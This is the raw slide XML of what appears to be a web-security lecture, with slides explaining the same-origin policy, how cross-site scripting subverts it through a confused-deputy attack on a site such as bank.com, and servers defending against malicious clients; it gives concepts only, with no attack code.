          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The hostname (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>) that provided the elements in the first place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" u="sng" dirty="0"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> received </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>web page’s origin</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>have access</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t> to the page’s elements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2614523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68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6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8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68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689">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300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="689">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68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 grpId="0" build="p"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="566674">
              <a:defRPr sz="10864"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>XSS: Subverting the SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Shape 722"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>provides a malicious script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="580319" indent="-580319" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Tricks the user’s browser into believing that the script’s origin is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1000259" lvl="1" indent="-582429" defTabSz="549148">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="4324" b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Runs with </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> access privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="Shape 723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378522" y="6858000"/>
            <a:ext cx="15609095" cy="547041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pPr marL="617361" indent="-617361" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>One general approach:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Trick the server of interest (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>) to actually send the attacker’s script to the user’s browser!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The browser will view the script as coming from the same origin… because it does!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>confused deputy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="663556167"/>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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361297" y="4191502"/>
            <a:ext cx="3321264" cy="1989599"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11871"/>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90" name="Shape 390"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293541" y="599249"/>
            <a:ext cx="21945599" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common threat: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Malicious clients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="4336264"/>
            <a:ext cx="2363300" cy="1700075"/>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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="4336264"/>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Service provider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132611" y="3247958"/>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394" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427265" y="4191502"/>
            <a:ext cx="4595438" cy="3123196"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10463"/>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395" name="Shape 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14441523" y="3247958"/>
            <a:ext cx="456692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Remote service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8649390" y="5675717"/>
            <a:ext cx="6315373" cy="1825139"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20575664">
            <a:off x="9308186" y="5785098"/>
            <a:ext cx="400177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CALL </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xfFHSd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8486471" y="6176240"/>
            <a:ext cx="6478291" cy="1913268"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481469" y="9319991"/>
            <a:ext cx="19421062" cy="3148596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Server needs to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>protect itself against malicious clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1012472" lvl="1" indent="-567972">
              <a:buSzPct val="75000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such clients w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>on’t run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>standard</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (e.g., typical web browser)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1012472" lvl="1" indent="-567972">
              <a:buSzPct val="75000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such clients w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>ill probe the limits of the interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="400" name="pasted-image.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5485252" y="5993965"/>
            <a:ext cx="3073353" cy="3334222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="401" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18488821" y="2929504"/>
            <a:ext cx="1932591" cy="2630370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20351792">
            <a:off x="10362695" y="5374113"/>
            <a:ext cx="3658610" cy="1132911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10770618" y="3630467"/>
            <a:ext cx="206057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i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11944071" y="4699476"/>
            <a:ext cx="1" cy="747847"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3464857548"/>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96"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="396"/>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3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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="402"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="402"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="403"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="398"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="398"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L -0.171816 0.143845" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="401"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.171816 0.143845 L -0.436030 0.285245" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40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animBg="1" advAuto="0"/>
      <p:bldP spid="397" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="398" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="402" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="403" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="404"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Two types of XSS</a:t>
